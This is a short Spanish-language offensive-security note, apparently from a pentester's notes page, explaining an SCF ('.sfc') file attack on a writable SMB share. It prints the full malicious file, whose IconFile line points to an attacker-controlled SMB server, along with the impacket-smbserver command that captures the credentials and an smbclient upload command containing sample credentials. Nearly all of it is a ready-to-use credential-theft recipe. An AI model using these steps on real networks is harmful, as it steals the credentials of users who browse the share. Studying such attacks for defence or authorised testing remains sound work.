DLL SFC File attack

Si fuera el caso de que hay un recurso compartido el cuál tenemos permisos de subir un archivo, podríamos realizar un DLL .sfc file attack.

Este consta en subir un archivo .sfc con un código malicioso el cuál apunte a un archivo .ico:

[Shell]
Command=2
IconFile=\\192.168.218.128\SmbFolder\iconomalicioso.ico
[Taskbar]
Command=ToggleDesktop

Este archivo lo creamos nosotros en nuestra máquina de atacante y lo ponemos en escucha con un impacket-smbserver.

Primero creamos el archivo y ejecutamos el servidor smb en nuestra máquina que estará esperando la petición del archivo iconomalicioso.ico

impacket-smbserver SmbFolder $(pwd) -smb2support

Seguidamente entramos en el recurso compartido:

smbclient -U "dc.local\allimos@Password1" //<IP victima>/SharedFiles # recurso compartido con permisos de subida

Con put ponemos el archivo y en el smbFolder deberíamos haber recibido las credenciales del usuario que sea propietario de la carpeta

Last updated 10 months ago